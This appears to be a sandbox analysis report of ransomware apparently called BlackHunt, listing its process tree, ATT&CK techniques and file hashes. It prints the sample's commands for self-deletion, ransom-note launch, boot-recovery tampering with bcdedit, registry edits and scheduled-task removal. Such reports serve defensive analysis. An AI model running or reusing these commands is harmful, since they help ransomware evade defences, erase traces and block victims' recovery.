C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:7304
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9388
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe"2⤵PID:11696
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:12360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:9888 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:10548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10548 -s 14444⤵
- Program crash
PID:11008
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1180
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:10976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12260
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:13696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:11904
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:10176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:6308
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9744
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10404
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9152
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3792
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:10384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 10548 -ip 105481⤵PID:4448
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD571bef7cf1df6681c97ffa6b4d496a078
SHA1c6d2f6fdda879b4e2213d99f28218d9c65e78f7a
SHA256d100aa4cad7936caf0749645d70556ee494608289a229f0408807f42c7fa0a12
SHA512042d7ef8a3afa7973c720b65c27fa325db2d54b8df0db81e86a746d35b24fb66f55c2876229a9ae9d1b5468cb627df463fe4be80f0dcf387cacedffee8e9624c
-
Filesize
684B
MD5abd52242eea33402d1816f0778f83484
SHA140155d50b4f49cde9f28bf6db4b68ce1f89de119
SHA25641595e013eed5c8b5201b5d51218f80b7e3d32ba24b15ed1b6d1c854c1584efd
SHA5122922479aa84b5a63d8e62b1ff4e8430963cd04d826964d9c850c2dd9e404e1445836e98a567afee702d024de0d555578eafb0085a2873211dc4cdcac644112e8
-
Filesize
1KB
MD54050d44a0c51ba2f066555c8f3d8fd9d
SHA11e6bf94f822d0194bc53d229c361672bed24a646
SHA2565ebf9e947965032ac1532c4914556ed3780c9ce031fe9701eafe9a2b578cea60
SHA51260f14ee373b4eacae6f74409ddfc7ae8421d0f598e6294b087d642987b986557acbce3acee4fa56590a3c474e9912fb0f204debd2af08a09c9f2ec2efa29ab68